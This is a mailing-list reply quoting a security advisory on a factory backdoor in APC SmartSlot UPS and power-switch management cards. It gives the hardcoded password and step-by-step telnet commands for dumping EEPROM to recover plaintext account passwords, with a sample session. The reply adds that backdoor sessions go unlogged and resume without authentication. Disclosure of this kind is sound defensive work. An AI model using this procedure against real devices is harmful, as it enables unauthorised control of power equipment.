In-Reply-To: <1076930672.19026.88.camel@localhost.localdomain> Just tested on a client's Symmetra RM 12000 and had some interesting results with the following setup: Model Number: AP9617 Manufacture Date: 12/20/2002 Hardware Revision: A10 Symmetra APP Ver: 120 Symmetra APP Date: 12/09/2002 AOS Card Ver: 120 AOS Card Date: 12/10/2002 There are a few side notes that should be noted: The backdoor login does NOT show up in the event log for the system. If the telnet session using the backdoor login is terminated with ^] then the session can be resumed simply by using telnet to sign back in with NO authentication. This even works if attempting to resume the session from a different IP address. >*** Background: >APC (American Power Conversion) SmartSwitch and UPS (uninterruptible power >supply) products have a Web and SNMP management card installed that permits >local serial console, TELNET, web and SNMP management, monitoring and >mains power control of attached devices. > > >*** The Problem: >APC SmartSlot Web/SNMP management cards have a "backdoor" password that can >be abused to extract plain text username/password details for all accounts >and hence gain unauthorised full control of the device. > >Tested vulnerable: >SmartUPS 3000RM with AP9606 AOS v3.2.1 and SmartUPS App v3.2.6 >MasterSwitch AP9212 with AP9606 AOS v3.0.3 and MasterSwitch App v2.2.0 > > >*** Description: >The "backdoor" password is designed for use by the factory for initial >configuration of the card, e.g. MAC Address, Serial Number etc. However, it >is possible to dump the contents of EEPROM which amongst other things >stores the account usernames and passwords. > >The "backdoor" password is accepted via either the local serial port or >TELNET. Use of the password on the web interface does not appear to be >possible. > > >*** To recreate (typical example): >Connect a console to the serial port or TELNET to the card. At the username >prompt use any username. The password is all alphabetic characters and is >case sensitive: TENmanUFactOryPOWER > >At the selection prompt, type 13 and press return. Type the byte address of >the EEPROM location to view, e.g. 1d0 and press return. Look carefully for >the username and password pairs. Different firmware revisions may have the >account details at different EEPROM locations. The accounts in the example >below are the default accounts after their passwords have been changed. >Username: apc Password: BBCCDDEEF >Username: device Password: AAAABBBBB > >Press return to get back to the Factory Menu and press ctrl-A to logout. >You can now TELNET to the card again and use the account details you've >just recovered to log into and control the device. > >You should use the other selections with extreme care. You may cause >irrepairable damage and will most certainly invalidate any warranty. >The EEPROM also contains other user-configurable options in either plain >text or binary encoded form. They are not detailed in this advisory. > >Example: > >[root@always root]# telnet 192.168.1.1 >Trying 192.168.1.1... >Connected to 192.168.1.1. >Escape character is '^]'. > >User Name : phade >Password : TENmanUFactOryPOWER > >Factory Menu ><CTRL-A> to exit > >1AP9606 >2WA0044004472 >3G9 >410/25/2000 >500 C0 B7 A2 C8 2D >6v3.2.1 >7A >8A >9192.168.1.1 >A255.255.255.0 >B192.168.1.254 >C >D >E >F >G > >Selection> 13 > >Enter byte address in Hex(XXXX): 1d0 > >01D0 FF 50 46 61 70 63 00 FF .PFapc.. >01D8 FF FF FF FF FF FF 42 42 ......BB >01E0 43 43 44 44 45 45 46 00 CCDDEEF. >01E8 FF 64 65 76 69 63 65 00 .device. >01F0 FF FF FF FF 41 41 41 41 ....AAAA >01F8 42 42 42 42 42 00 FF 61 BBBBB..a >0200 64 6D 69 6E 20 75 73 65 dmin use >0208 72 20 70 68 72 61 73 65 r phrase >0210 00 FF FF FF FF FF FF FF ........ >0218 FF FF FF FF FF FF FF FF ........ >0220 64 65 76 69 63 65 20 75 device u >0228 73 65 72 20 70 68 72 61 ser phra >0230 73 65 00 FF FF FF FF FF se...... >0238 FF FF FF FF FF FF FF FF ........ >0240 FF 00 00 FF FF FF FF 21 .......! >0248 56 00 00 00 00 00 00 55 V......U > ><sp>nxt,b-bck,p-pch,other-exit > > >*** Workaround/fix: >Ensure that access to the local serial port is physically restricted and >disable the TELNET interface as described in the device documentation. A >patched version of the firmware which requires the management password >to be entered before accessing the factory settings may be available >from APC. > > >*** Vendor status: >APC were first notified six months ago on 12th August 2003 and were >initially helpful in patching the problem. However, after testing a couple >of beta fixes I've heard nothing for over 3 months. > >Dave Tarbatt, >http://null.sniffing.net/ > > >--=-KV1stT8YdRNcY3VGzrOj-- > >
